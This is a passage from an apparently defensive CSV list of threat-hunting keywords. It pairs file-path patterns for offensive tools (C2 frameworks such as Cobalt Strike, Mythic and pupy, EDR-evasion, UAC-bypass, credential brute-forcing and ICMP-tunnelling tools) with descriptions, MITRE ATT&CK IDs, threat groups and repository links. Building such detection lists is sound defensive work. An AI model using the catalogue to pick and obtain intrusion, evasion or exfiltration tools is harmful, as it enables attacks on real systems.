T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/TROUBLE-1/Vajra*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/trusted_sec_bofs/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/trusted_sec_remote_bofs/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/trustedsec/*,offensive_tool_keyword,Github Username,github repo hosting various exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/trustedsec,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tso-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tso-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tweetshell.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/twittor.git*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*/UACBypasses/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/UACME.git*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z 
-*/UAC-SilentClean/*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/uberfile.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ubiquiti-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/udmp-parser.git*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,1,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*/umeshshinde19/instainsane*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,1,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -*/unDefender.exe*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*/unDefender.git*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*/undertheradar.git*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*/unhook-bof*,offensive_tool_keyword,C2 related tools,Thread Stack 
Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*/unhook-bof*,offensive_tool_keyword,cobaltstrike,Remove API hooks from a Beacon process.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/unhook-bof,1,1,N/A,10,10,240,61,2021-09-18T18:12:41Z,2021-01-13T02:20:44Z -*/unhook-bof*,offensive_tool_keyword,cobaltstrike,Remove API hooks from a Beacon process.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/unhook-bof,1,1,N/A,10,10,51,14,2022-03-13T15:57:10Z,2021-07-02T14:55:38Z -*/UnhookingPatch.git*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*/unicorn.git*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*/unicorn.py*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*/unittest.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/unshackle.git*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*/unshackle.modules*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,0,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*/unused/locktest.sh*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/unused/Yosemite.patch*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/unusual-port.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/updog-*.tar.gz*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*/updog.git*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*/updog/archive/updog-*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*/upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/uptime-agent-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/url-snarf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/user_data/*/keylog.txt*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*/userenum.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*/UserlandBypass/*.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*/username-anarchy*,offensive_tool_keyword,username-anarchy,Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.,T1110 - T1134 - T1078,TA0006,N/A,N/A,Credential Access,https://github.com/urbanadventurer/username-anarchy,1,1,N/A,N/A,6,564,113,2022-01-26T18:34:02Z,2012-11-07T05:35:10Z -*/UserNamespaceOverlayfsSetuidWriteExec/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/usniper.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/usr/bin/pkexec*,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,1,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*/usr/bin/polenum*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - 
TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*/usr/local/bin/exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/usr/local/pwndrop/*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*/usr/share/cobaltstrike/*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*/usr/share/wordlists/*.txt*,offensive_tool_keyword,fcrackzip,a Free/Fast Zip Password Cracker,T1473 - T1021.002,TA0005 - TA0008,N/A,N/A,Credential Access,https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/utils/addcomputer.py*,offensive_tool_keyword,sam-the-admin,script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1208 - T1218.005 - T1055.002,TA0006 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WazeHell/sam-the-admin/tree/main/utils,1,0,N/A,N/A,10,929,190,2022-07-10T22:23:13Z,2021-12-11T15:10:30Z -*/utils/obfuscate.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/UTWOqVQ132/*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/UUID_bypass.py*,offensive_tool_keyword,FourEye,AV 
Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/vainject.c*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/vajra/phishApp.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/var/lib/ptunnel*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*/var/log/exegol/*.log*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Vegile.git*,offensive_tool_keyword,BruteSploit,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. 
Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*/venom.git*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/venom.sh *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/venom/,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/ventrilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap 